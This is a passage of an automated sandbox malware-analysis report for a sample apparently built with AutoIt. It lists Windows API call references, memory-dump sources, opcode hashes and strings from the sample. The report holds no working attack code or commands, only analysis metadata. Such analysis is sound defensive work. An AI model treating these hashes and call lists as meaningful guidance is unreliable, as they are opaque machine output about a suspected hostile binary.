                                                   • Associated: 00000005.00000002.1295798374.0000000000CAE000.00000004.00000001.01000000.00000004.sdmp
                                                   • Associated: 00000005.00000002.1296093581.0000000000CB7000.00000002.00000001.01000000.00000004.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_5_2_bf0000_25Lz840Dmh.jbxd
                                                  Similarity
                                                  • API ID: AllocateHeap_free
                                                  • String ID:
                                                  • API String ID: 614378929-0
                                                  • Opcode ID: fa7fe5778f4ee98d25dc049677a9c7fe6b219f74209c0ccfdc49f09a14ad7aec
                                                  • Instruction ID: 227151bcb008234b5ac496b4231d79e58a9ce33e38a276281f0b3e151876624d
                                                  • Opcode Fuzzy Hash: fa7fe5778f4ee98d25dc049677a9c7fe6b219f74209c0ccfdc49f09a14ad7aec
                                                  • Instruction Fuzzy Hash: 6711C272908A21AFCF312F75FC457AF37989F063A1F104529F9689A661DE308A91B790
                                                  APIs
                                                  • _memset.LIBCMT ref: 00BF44CF
                                                    • Part of subcall function 00BF407C: _memset.LIBCMT ref: 00BF40FC
                                                    • Part of subcall function 00BF407C: _wcscpy.LIBCMT ref: 00BF4150
                                                    • Part of subcall function 00BF407C: Shell_NotifyIconW.SHELL32(00000001,000003A8), ref: 00BF4160
                                                  • KillTimer.USER32(?,00000001,?,?), ref: 00BF4524
                                                  • SetTimer.USER32(?,00000001,000002EE,00000000), ref: 00BF4533
                                                  • Shell_NotifyIconW.SHELL32(00000001,000003A8), ref: 00C2D4B9
                                                  Memory Dump Source
                                                  • Source File: 00000005.00000002.1290109289.0000000000BF1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00BF0000, based on PE: true
                                                   • Associated: 00000005.00000002.1290075298.0000000000BF0000.00000002.00000001.01000000.00000004.sdmp
                                                   • Associated: 00000005.00000002.1295627778.0000000000C7F000.00000002.00000001.01000000.00000004.sdmp
                                                   • Associated: 00000005.00000002.1295627778.0000000000CA4000.00000002.00000001.01000000.00000004.sdmp
                                                   • Associated: 00000005.00000002.1295798374.0000000000CAE000.00000004.00000001.01000000.00000004.sdmp
                                                   • Associated: 00000005.00000002.1296093581.0000000000CB7000.00000002.00000001.01000000.00000004.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_5_2_bf0000_25Lz840Dmh.jbxd
                                                  Similarity
                                                  • API ID: IconNotifyShell_Timer_memset$Kill_wcscpy
                                                  • String ID:
                                                  • API String ID: 1378193009-0
                                                  • Opcode ID: fcbc91f010c584168a1dd71708b9c1b43200587f8f2092a9e26933ad4b6835e1
                                                  • Instruction ID: fd8a060cfeb8f9a2ec648e5a8a96575cd95d1078092c7f61bfa87488074475e8
                                                  • Opcode Fuzzy Hash: fcbc91f010c584168a1dd71708b9c1b43200587f8f2092a9e26933ad4b6835e1
                                                  • Instruction Fuzzy Hash: 5521D370904798AFE732AB249895BFBBBECAF11304F0400DDE79E57141C3746A88CB41
                                                  APIs
                                                    • Part of subcall function 00BF5A15: WideCharToMultiByte.KERNEL32(00000000,00000000,?,00000001,00000000,00000000,00000000,00000000,00000000,00000000,?,00C57896,?,?,00000000), ref: 00BF5A2C
                                                    • Part of subcall function 00BF5A15: WideCharToMultiByte.KERNEL32(00000000,00000000,?,00000001,00000000,?,00000000,00000000,?,?,00C57896,?,?,00000000,?,?), ref: 00BF5A50
                                                  • gethostbyname.WSOCK32(?,?,?), ref: 00C66399
                                                  • WSAGetLastError.WSOCK32(00000000), ref: 00C663A4
                                                  • _memmove.LIBCMT ref: 00C663D1
                                                  • inet_ntoa.WSOCK32(?), ref: 00C663DC
                                                  Memory Dump Source
                                                  • Source File: 00000005.00000002.1290109289.0000000000BF1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00BF0000, based on PE: true
                                                   • Associated: 00000005.00000002.1290075298.0000000000BF0000.00000002.00000001.01000000.00000004.sdmp
                                                   • Associated: 00000005.00000002.1295627778.0000000000C7F000.00000002.00000001.01000000.00000004.sdmp
                                                   • Associated: 00000005.00000002.1295627778.0000000000CA4000.00000002.00000001.01000000.00000004.sdmp
                                                   • Associated: 00000005.00000002.1295798374.0000000000CAE000.00000004.00000001.01000000.00000004.sdmp
                                                   • Associated: 00000005.00000002.1296093581.0000000000CB7000.00000002.00000001.01000000.00000004.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_5_2_bf0000_25Lz840Dmh.jbxd
                                                  Similarity
                                                  • API ID: ByteCharMultiWide$ErrorLast_memmovegethostbynameinet_ntoa
                                                  • String ID:
                                                  • API String ID: 1504782959-0
                                                  • Opcode ID: 21304b27b4aed8e97ceb9d4eaa5c825185202a378436eb202bb6c6064d48ccbb
                                                  • Instruction ID: 998fa89d2f6cf18ebaa349652e79ec2e185e4303a7c512f848d45f9dba8d7b7e
                                                  • Opcode Fuzzy Hash: 21304b27b4aed8e97ceb9d4eaa5c825185202a378436eb202bb6c6064d48ccbb
                                                  • Instruction Fuzzy Hash: 04116031500109AFCB14FBA4DD86DFEB7B8AF05310B1441A9F605A72A1DB30AE18DB62
                                                  APIs
                                                  • SendMessageW.USER32(?,000000B0,?,?), ref: 00C48B61
                                                  • SendMessageW.USER32(?,000000C9,?,00000000), ref: 00C48B73
                                                  • SendMessageW.USER32(?,000000C9,?,00000000), ref: 00C48B89
                                                  • SendMessageW.USER32(?,000000C9,?,00000000), ref: 00C48BA4
                                                  Memory Dump Source
                                                  • Source File: 00000005.00000002.1290109289.0000000000BF1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00BF0000, based on PE: true
                                                   • Associated: 00000005.00000002.1290075298.0000000000BF0000.00000002.00000001.01000000.00000004.sdmp
                                                   • Associated: 00000005.00000002.1295627778.0000000000C7F000.00000002.00000001.01000000.00000004.sdmp
                                                   • Associated: 00000005.00000002.1295627778.0000000000CA4000.00000002.00000001.01000000.00000004.sdmp
                                                   • Associated: 00000005.00000002.1295798374.0000000000CAE000.00000004.00000001.01000000.00000004.sdmp
                                                   • Associated: 00000005.00000002.1296093581.0000000000CB7000.00000002.00000001.01000000.00000004.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_5_2_bf0000_25Lz840Dmh.jbxd
                                                  Similarity
                                                  • API ID: MessageSend
                                                  • String ID:
                                                  • API String ID: 3850602802-0
                                                  • Opcode ID: 2ddb175780e8b079bb117d1a9f61ac6c6341059d57fa3df29ad2180dd051c61b
                                                  • Instruction ID: 01df94357e0ebaeb36b120fe0ea40e101301e9ae8a02bf3e482dad2485476a4c
                                                  • Opcode Fuzzy Hash: 2ddb175780e8b079bb117d1a9f61ac6c6341059d57fa3df29ad2180dd051c61b
                                                  • Instruction Fuzzy Hash: E1115A79900218FFEB10DFA5CC84FADBBB8FB48710F2040A5EA00B7290DA716E11DB94
                                                  APIs
                                                    • Part of subcall function 00BF2612: GetWindowLongW.USER32(?,000000EB), ref: 00BF2623
                                                  • DefDlgProcW.USER32(?,00000020,?), ref: 00BF12D8
                                                  • GetClientRect.USER32(?,?), ref: 00C2B5FB
                                                  • GetCursorPos.USER32(?), ref: 00C2B605
                                                  • ScreenToClient.USER32(?,?), ref: 00C2B610
                                                  Memory Dump Source
                                                  • Source File: 00000005.00000002.1290109289.0000000000BF1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00BF0000, based on PE: true
                                                   • Associated: 00000005.00000002.1290075298.0000000000BF0000.00000002.00000001.01000000.00000004.sdmp
                                                   • Associated: 00000005.00000002.1295627778.0000000000C7F000.00000002.00000001.01000000.00000004.sdmp
                                                   • Associated: 00000005.00000002.1295627778.0000000000CA4000.00000002.00000001.01000000.00000004.sdmp
                                                   • Associated: 00000005.00000002.1295798374.0000000000CAE000.00000004.00000001.01000000.00000004.sdmp
                                                   • Associated: 00000005.00000002.1296093581.0000000000CB7000.00000002.00000001.01000000.00000004.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_5_2_bf0000_25Lz840Dmh.jbxd
                                                  Similarity
                                                  • API ID: Client$CursorLongProcRectScreenWindow
                                                  • String ID:
                                                  • API String ID: 4127811313-0
                                                  • Opcode ID: 30279f4807a6e972a000896e6077eb374de1e50848631f5d706ae44533faab5f
                                                  • Instruction ID: 7929e8a6b9a3f2ce14f39b51dab40e872e61ac61d2e6162c8d99df65f1277b80
                                                  • Opcode Fuzzy Hash: 30279f4807a6e972a000896e6077eb374de1e50848631f5d706ae44533faab5f
                                                  • Instruction Fuzzy Hash: 10112835A0001DEFCB00EFA8D885AFE77F8FB05310F400895FA01E7140C731AA969BA5
                                                  APIs
                                                  • QueryPerformanceCounter.KERNEL32(?,?,?,?,?,?,?,00C4FCED,?,00C50D40,?,00008000), ref: 00C5115F
                                                  • Sleep.KERNEL32(00000000,?,?,?,?,?,?,00C4FCED,?,00C50D40,?,00008000), ref: 00C51184
                                                  • QueryPerformanceCounter.KERNEL32(?,?,?,?,?,?,?,00C4FCED,?,00C50D40,?,00008000), ref: 00C5118E
                                                  • Sleep.KERNEL32(?,?,?,?,?,?,?,00C4FCED,?,00C50D40,?,00008000), ref: 00C511C1
                                                  Memory Dump Source
                                                  • Source File: 00000005.00000002.1290109289.0000000000BF1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00BF0000, based on PE: true
                                                   • Associated: 00000005.00000002.1290075298.0000000000BF0000.00000002.00000001.01000000.00000004.sdmp
                                                   • Associated: 00000005.00000002.1295627778.0000000000C7F000.00000002.00000001.01000000.00000004.sdmp
                                                   • Associated: 00000005.00000002.1295627778.0000000000CA4000.00000002.00000001.01000000.00000004.sdmp
                                                   • Associated: 00000005.00000002.1295798374.0000000000CAE000.00000004.00000001.01000000.00000004.sdmp
                                                   • Associated: 00000005.00000002.1296093581.0000000000CB7000.00000002.00000001.01000000.00000004.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_5_2_bf0000_25Lz840Dmh.jbxd
                                                  Similarity
                                                  • API ID: CounterPerformanceQuerySleep
                                                  • String ID:
                                                  • API String ID: 2875609808-0
                                                  • Opcode ID: 1d3452b8fc7cb9b14c0e6c8f7fb54207d99b5c4ffdea369350e8d5cdf9cc8e42
                                                  • Instruction ID: 666e09c3070a430f0cd547ddd4b0fb415fd34c5e180fe45d996747afc9f7a0aa
                                                  • Opcode Fuzzy Hash: 1d3452b8fc7cb9b14c0e6c8f7fb54207d99b5c4ffdea369350e8d5cdf9cc8e42
                                                  • Instruction Fuzzy Hash: D0114835C00918E7CF009FA5D888BEEBB78FB19712F444099EE45B6240CA7096D4CBA9
                                                  APIs
                                                  • GetModuleFileNameW.KERNEL32(?,?,00000104,00000000,00000000), ref: 00C4D84D
                                                  • LoadTypeLibEx.OLEAUT32(?,00000002,?), ref: 00C4D864
                                                  • RegisterTypeLib.OLEAUT32(?,?,00000000), ref: 00C4D879
                                                  • RegisterTypeLibForUser.OLEAUT32(?,?,00000000), ref: 00C4D897
                                                  Memory Dump Source
                                                  • Source File: 00000005.00000002.1290109289.0000000000BF1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00BF0000, based on PE: true
                                                   • Associated: 00000005.00000002.1290075298.0000000000BF0000.00000002.00000001.01000000.00000004.sdmp
                                                   • Associated: 00000005.00000002.1295627778.0000000000C7F000.00000002.00000001.01000000.00000004.sdmp
                                                   • Associated: 00000005.00000002.1295627778.0000000000CA4000.00000002.00000001.01000000.00000004.sdmp
                                                   • Associated: 00000005.00000002.1295798374.0000000000CAE000.00000004.00000001.01000000.00000004.sdmp
                                                   • Associated: 00000005.00000002.1296093581.0000000000CB7000.00000002.00000001.01000000.00000004.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_5_2_bf0000_25Lz840Dmh.jbxd
                                                  Similarity
                                                  • API ID: Type$Register$FileLoadModuleNameUser
                                                  • String ID:
                                                  • API String ID: 1352324309-0
                                                  APIs
                                                  Similarity
                                                  • API ID: __cftoe_l__cftof_l__cftog_l__fltout2
                                                  • String ID:
                                                  • API String ID: 3016257755-0
                                                  APIs
                                                  • GetWindowRect.USER32(?,?), ref: 00C7B2E4
                                                  • ScreenToClient.USER32(?,?), ref: 00C7B2FC
                                                  • ScreenToClient.USER32(?,?), ref: 00C7B320
                                                  • InvalidateRect.USER32(?,?,?,?,?,?,?,?,?,?,?,?), ref: 00C7B33B
                                                  Similarity
                                                  • API ID: ClientRectScreen$InvalidateWindow
                                                  • String ID:
                                                  • API String ID: 357397906-0
                                                  APIs
                                                  • _memset.LIBCMT ref: 00C7B644
                                                  • _memset.LIBCMT ref: 00C7B653
                                                  • CreateProcessW.KERNEL32(00000000,?,00000000,00000000,00000000,00000020,00000000,00000000,00CB6F20,00CB6F64), ref: 00C7B682
                                                  • CloseHandle.KERNEL32 ref: 00C7B694
                                                  Similarity
                                                  • API ID: _memset$CloseCreateHandleProcess
                                                  • String ID:
                                                  • API String ID: 3277943733-0
                                                  APIs
                                                  • EnterCriticalSection.KERNEL32(?), ref: 00C56BE6
                                                    • Part of subcall function 00C576C4: _memset.LIBCMT ref: 00C576F9
                                                  • _memmove.LIBCMT ref: 00C56C09
                                                  • _memset.LIBCMT ref: 00C56C16
                                                  • LeaveCriticalSection.KERNEL32(?), ref: 00C56C26
                                                  Similarity
                                                  • API ID: CriticalSection_memset$EnterLeave_memmove
                                                  • String ID:
                                                  • API String ID: 48991266-0
                                                  APIs
                                                  • GetSysColor.USER32(00000008), ref: 00BF2231
                                                  • SetTextColor.GDI32(?,000000FF), ref: 00BF223B
                                                  • SetBkMode.GDI32(?,00000001), ref: 00BF2250
                                                  • GetStockObject.GDI32(00000005), ref: 00BF2258
                                                  • GetWindowDC.USER32(?,00000000), ref: 00C2BE83
                                                  • GetPixel.GDI32(00000000,00000000,00000000), ref: 00C2BE90
                                                  • GetPixel.GDI32(00000000,?,00000000), ref: 00C2BEA9
                                                  • GetPixel.GDI32(00000000,00000000,?), ref: 00C2BEC2
                                                  • GetPixel.GDI32(00000000,?,?), ref: 00C2BEE2
                                                  • ReleaseDC.USER32(?,00000000), ref: 00C2BEED
                                                  Similarity
                                                  • API ID: Pixel$Color$ModeObjectReleaseStockTextWindow
                                                  • String ID:
                                                  • API String ID: 1946975507-0
                                                  APIs
                                                  • GetCurrentThread.KERNEL32 ref: 00C4871B
                                                  • OpenThreadToken.ADVAPI32(00000000,?,?,?,00C482E6), ref: 00C48722
                                                  • GetCurrentProcess.KERNEL32(00000028,?,?,?,?,00C482E6), ref: 00C4872F
                                                  • OpenProcessToken.ADVAPI32(00000000,?,?,?,00C482E6), ref: 00C48736
                                                  Similarity
                                                  • API ID: CurrentOpenProcessThreadToken
                                                  • String ID:
                                                  • API String ID: 3974789173-0
                                                  APIs
                                                  • OleSetContainedObject.OLE32(?,00000001), ref: 00C4B4BE
                                                  Strings
                                                  Similarity
                                                  • API ID: ContainedObject
                                                  • String ID: AutoIt3GUI$Container
                                                  • API String ID: 3565006973-3941886329
                                                  APIs
                                                    • Part of subcall function 00C0FC86: _wcscpy.LIBCMT ref: 00C0FCA9
                                                    • Part of subcall function 00BF9837: __itow.LIBCMT ref: 00BF9862
                                                    • Part of subcall function 00BF9837: __swprintf.LIBCMT ref: 00BF98AC
                                                  • __wcsnicmp.LIBCMT ref: 00C5B02D
                                                  • WNetUseConnectionW.MPR(00000000,?,?,00000000,?,?,00000100,?), ref: 00C5B0F6
                                                  Strings
                                                  Similarity
                                                  • API ID: Connection__itow__swprintf__wcsnicmp_wcscpy
                                                  • String ID: LPT
                                                  • API String ID: 3222508074-1350329615
                                                  APIs
                                                  • Sleep.KERNEL32(00000000), ref: 00C02968
                                                  • GlobalMemoryStatusEx.KERNEL32(?), ref: 00C02981
                                                  Strings
                                                  Similarity
                                                  • API ID: GlobalMemorySleepStatus
                                                  • String ID: @
                                                  • API String ID: 2783356886-2766056989
                                                  APIs
                                                    • Part of subcall function 00BF4F0B: __fread_nolock.LIBCMT ref: 00BF4F29
                                                  • _wcscmp.LIBCMT ref: 00C59824
                                                  • _wcscmp.LIBCMT ref: 00C59837
                                                  Strings
                                                  Similarity
                                                  • API ID: _wcscmp$__fread_nolock
                                                  • String ID: FILE
                                                  • API String ID: 4029003684-3121273764
                                                  APIs
                                                  • _memset.LIBCMT ref: 00C6259E
                                                  • InternetCrackUrlW.WININET(?,00000000,00000000,0000007C), ref: 00C625D4
                                                  Strings
                                                  Similarity
                                                  • API ID: CrackInternet_memset
                                                  • String ID: |
                                                  • API String ID: 1413715105-2343686810
                                                  APIs
                                                  • SendMessageW.USER32(?,00001132,00000000,?), ref: 00C77B61
                                                  • SendMessageW.USER32(?,00001105,00000000,00000000), ref: 00C77B76
                                                  Strings
                                                  Similarity
                                                  • API ID: MessageSend
                                                  • String ID: '
                                                  • API String ID: 3850602802-1997036262
                                                  APIs
                                                  • DestroyWindow.USER32(?,?,?,?), ref: 00C76B17
                                                  • MoveWindow.USER32(?,?,?,?,?,00000001,?,?,?), ref: 00C76B53
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000005.00000002.1290109289.0000000000BF1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00BF0000, based on PE: true
                                                  • Associated: 00000005.00000002.1290075298.0000000000BF0000.00000002.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000005.00000002.1295627778.0000000000C7F000.00000002.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000005.00000002.1295627778.0000000000CA4000.00000002.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000005.00000002.1295798374.0000000000CAE000.00000004.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000005.00000002.1296093581.0000000000CB7000.00000002.00000001.01000000.00000004.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_5_2_bf0000_25Lz840Dmh.jbxd
                                                  Similarity
                                                  • API ID: Window$DestroyMove
                                                  • String ID: static
                                                  • API String ID: 2139405536-2160076837
                                                  • Opcode ID: 92cad383a7277ebf0ae88269921740585a72318af377ce7f6c398b3321623620
                                                  • Instruction ID: 742a21fae1e757383fb69e832315b126a74afc787f5e5df6c98dcf1e041a0c93
                                                  • Opcode Fuzzy Hash: 92cad383a7277ebf0ae88269921740585a72318af377ce7f6c398b3321623620
                                                  • Instruction Fuzzy Hash: E4316D71200608AEDB149F68CC81BFB77A9FF49760F10C629F9A9D7190DB31AD91DB60
                                                  APIs
                                                  • _memset.LIBCMT ref: 00C52911
                                                  • GetMenuItemInfoW.USER32(?,?,00000000,00000030), ref: 00C5294C
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000005.00000002.1290109289.0000000000BF1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00BF0000, based on PE: true
                                                  • Associated: 00000005.00000002.1290075298.0000000000BF0000.00000002.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000005.00000002.1295627778.0000000000C7F000.00000002.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000005.00000002.1295627778.0000000000CA4000.00000002.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000005.00000002.1295798374.0000000000CAE000.00000004.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000005.00000002.1296093581.0000000000CB7000.00000002.00000001.01000000.00000004.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_5_2_bf0000_25Lz840Dmh.jbxd
                                                  Similarity
                                                  • API ID: InfoItemMenu_memset
                                                  • String ID: 0
                                                  • API String ID: 2223754486-4108050209
                                                  • Opcode ID: 1156e6ee16fb2636cf53e3bc41fe29833bde0b0ddc92472b07ef8bc4e6a6879f
                                                  • Instruction ID: e3416dc15af849986a96cbdd5f245a30ee7e6f2e9587f5c4c75f59d0958ef5c5
                                                  • Opcode Fuzzy Hash: 1156e6ee16fb2636cf53e3bc41fe29833bde0b0ddc92472b07ef8bc4e6a6879f
                                                  • Instruction Fuzzy Hash: 2531F57A6003059BEB24DF88D885BEEBBF8EF07351F140019EC95A62A0D7709AC8DB55
                                                  APIs
                                                  • __snwprintf.LIBCMT ref: 00C63A66
                                                    • Part of subcall function 00BF7DE1: _memmove.LIBCMT ref: 00BF7E22
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000005.00000002.1290109289.0000000000BF1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00BF0000, based on PE: true
                                                  • Associated: 00000005.00000002.1290075298.0000000000BF0000.00000002.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000005.00000002.1295627778.0000000000C7F000.00000002.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000005.00000002.1295627778.0000000000CA4000.00000002.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000005.00000002.1295798374.0000000000CAE000.00000004.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000005.00000002.1296093581.0000000000CB7000.00000002.00000001.01000000.00000004.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_5_2_bf0000_25Lz840Dmh.jbxd
                                                  Similarity
                                                  • API ID: __snwprintf_memmove
                                                  • String ID: , $$AUTOITCALLVARIABLE%d
                                                  • API String ID: 3506404897-2584243854
                                                  • Opcode ID: 3dd9914febf97f15ebece2b068326b6197eeab60f65979275addbfc03c55c8a3
                                                  • Instruction ID: b0e619ccd373b2b33d7494cdbe06ea63d370d4e787d10b796e25a871c27398b0
                                                  • Opcode Fuzzy Hash: 3dd9914febf97f15ebece2b068326b6197eeab60f65979275addbfc03c55c8a3
                                                  • Instruction Fuzzy Hash: 64216131A0011DABCF20EFE4CC91AAEB7F5FF45700F5044A4E655A7182DB30EA4AEB61
                                                  APIs
                                                  • SendMessageW.USER32(00000000,00000143,00000000,?), ref: 00C76761
                                                  • SendMessageW.USER32(?,0000014E,00000000,00000000), ref: 00C7676C
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000005.00000002.1290109289.0000000000BF1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00BF0000, based on PE: true
                                                  • Associated: 00000005.00000002.1290075298.0000000000BF0000.00000002.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000005.00000002.1295627778.0000000000C7F000.00000002.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000005.00000002.1295627778.0000000000CA4000.00000002.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000005.00000002.1295798374.0000000000CAE000.00000004.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000005.00000002.1296093581.0000000000CB7000.00000002.00000001.01000000.00000004.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_5_2_bf0000_25Lz840Dmh.jbxd
                                                  Similarity
                                                  • API ID: MessageSend
                                                  • String ID: Combobox
                                                  • API String ID: 3850602802-2096851135
                                                  • Opcode ID: 1506ee7e4f196cf090f943981e8d60c74dcd1136832bbd0e39a32b88ea059bf9
                                                  • Instruction ID: 0c52e704084ad98423f04e3c9178e9bfecc0a142c90fd88f80691f2920f1d870
                                                  • Opcode Fuzzy Hash: 1506ee7e4f196cf090f943981e8d60c74dcd1136832bbd0e39a32b88ea059bf9
                                                  • Instruction Fuzzy Hash: 5E11C475300609AFEF19CF54CC81FBB376AEB883A8F108129F92C97290D631DD5187A0
                                                  APIs
                                                    • Part of subcall function 00BF1D35: CreateWindowExW.USER32(?,?,?,?,?,?,?,?,?,?,00000000,00000096), ref: 00BF1D73
                                                    • Part of subcall function 00BF1D35: GetStockObject.GDI32(00000011), ref: 00BF1D87
                                                    • Part of subcall function 00BF1D35: SendMessageW.USER32(00000000,00000030,00000000), ref: 00BF1D91
                                                  • GetWindowRect.USER32(00000000,?), ref: 00C76C71
                                                  • GetSysColor.USER32(00000012), ref: 00C76C8B
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000005.00000002.1290109289.0000000000BF1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00BF0000, based on PE: true
                                                  • Associated: 00000005.00000002.1290075298.0000000000BF0000.00000002.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000005.00000002.1295627778.0000000000C7F000.00000002.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000005.00000002.1295627778.0000000000CA4000.00000002.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000005.00000002.1295798374.0000000000CAE000.00000004.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000005.00000002.1296093581.0000000000CB7000.00000002.00000001.01000000.00000004.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_5_2_bf0000_25Lz840Dmh.jbxd
                                                  Similarity
                                                  • API ID: Window$ColorCreateMessageObjectRectSendStock
                                                  • String ID: static
                                                  • API String ID: 1983116058-2160076837
                                                  • Opcode ID: 86d942fb2f9cdaeb783e8eff6b7004822aa871c9408390ea3455cd69bb1b44a8
                                                  • Instruction ID: f7ad7cab4890ea7be5ea29b0acea7d24c9467cf65039b6494e9cfee9c80cb0a4
                                                  • Opcode Fuzzy Hash: 86d942fb2f9cdaeb783e8eff6b7004822aa871c9408390ea3455cd69bb1b44a8
                                                  • Instruction Fuzzy Hash: A621297261020AAFDF05DFA8CC46AFA7BB8FB08314F008669F999D3250D635E851DB60
                                                  APIs
                                                  • GetWindowTextLengthW.USER32(00000000), ref: 00C769A2
                                                  • SendMessageW.USER32(?,000000B1,00000000,00000000), ref: 00C769B1
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000005.00000002.1290109289.0000000000BF1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00BF0000, based on PE: true
                                                  • Associated: 00000005.00000002.1290075298.0000000000BF0000.00000002.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000005.00000002.1295627778.0000000000C7F000.00000002.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000005.00000002.1295627778.0000000000CA4000.00000002.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000005.00000002.1295798374.0000000000CAE000.00000004.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000005.00000002.1296093581.0000000000CB7000.00000002.00000001.01000000.00000004.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_5_2_bf0000_25Lz840Dmh.jbxd
                                                  Similarity
                                                  • API ID: LengthMessageSendTextWindow
                                                  • String ID: edit
                                                  • API String ID: 2978978980-2167791130
                                                  • Opcode ID: 35164bdff1ccde88e4cdb6fbf462ba44634efbb17249f644b0582e570af5a343
                                                  • Instruction ID: e52c90fea63d1e02b1029eed09dc8f55f8e635af7b4f5e928fabe93737b078ea
                                                  • Opcode Fuzzy Hash: 35164bdff1ccde88e4cdb6fbf462ba44634efbb17249f644b0582e570af5a343
                                                  • Instruction Fuzzy Hash: BC118F71500508ABEB108E74DC81BEB37A9EB05378F508728FAB9971E0C731DC91A760
                                                  APIs
                                                  • _memset.LIBCMT ref: 00C52A22
                                                  • GetMenuItemInfoW.USER32(00000030,?,00000000,00000030), ref: 00C52A41
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000005.00000002.1290109289.0000000000BF1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00BF0000, based on PE: true
                                                  • Associated: 00000005.00000002.1290075298.0000000000BF0000.00000002.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000005.00000002.1295627778.0000000000C7F000.00000002.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000005.00000002.1295627778.0000000000CA4000.00000002.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000005.00000002.1295798374.0000000000CAE000.00000004.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000005.00000002.1296093581.0000000000CB7000.00000002.00000001.01000000.00000004.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_5_2_bf0000_25Lz840Dmh.jbxd
                                                  Similarity
                                                  • API ID: InfoItemMenu_memset
                                                  • String ID: 0
                                                  • API String ID: 2223754486-4108050209
                                                  • Opcode ID: feb10533ec94370a71abd6fb37c0ad15d9be720dba5001230aa08d35702b9ce2
                                                  • Instruction ID: b7772b08288659cd8d48c2aaae74ca8d758769e74c880f419ac3769f4ccc1f87
                                                  • Opcode Fuzzy Hash: feb10533ec94370a71abd6fb37c0ad15d9be720dba5001230aa08d35702b9ce2
                                                  • Instruction Fuzzy Hash: 6811E97AA01114ABCF35DB58EC44BAE73F8AB47301F044121EC65E7291D730AE8EE799
                                                  APIs
                                                  • InternetOpenW.WININET(?,00000000,00000000,00000000,00000000), ref: 00C6222C
                                                  • InternetSetOptionW.WININET(00000000,00000032,?,00000008), ref: 00C62255
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000005.00000002.1290109289.0000000000BF1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00BF0000, based on PE: true
                                                  • Associated: 00000005.00000002.1290075298.0000000000BF0000.00000002.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000005.00000002.1295627778.0000000000C7F000.00000002.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000005.00000002.1295627778.0000000000CA4000.00000002.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000005.00000002.1295798374.0000000000CAE000.00000004.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000005.00000002.1296093581.0000000000CB7000.00000002.00000001.01000000.00000004.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_5_2_bf0000_25Lz840Dmh.jbxd
                                                  Similarity
                                                  • API ID: Internet$OpenOption
                                                  • String ID: <local>
                                                  • API String ID: 942729171-4266983199
                                                  • Opcode ID: f90ab5df88795d5e05dbf97a50a0608493dac53a75575b522372e19ae88c1367
                                                  • Instruction ID: b23e6d55be81eeecff2099b475fb53e736275d346dc7d84d7453bb036bfe9435
